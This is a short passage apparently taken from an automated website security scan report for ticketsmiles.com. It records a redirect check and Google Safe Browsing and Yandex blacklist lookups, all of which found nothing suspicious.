Referer: http://www.google.com/search?q=ticketsmiles.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ticketsmiles.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ticketsmiles.com/

Result: ticketsmiles.com is not infected or malware details are not published yet.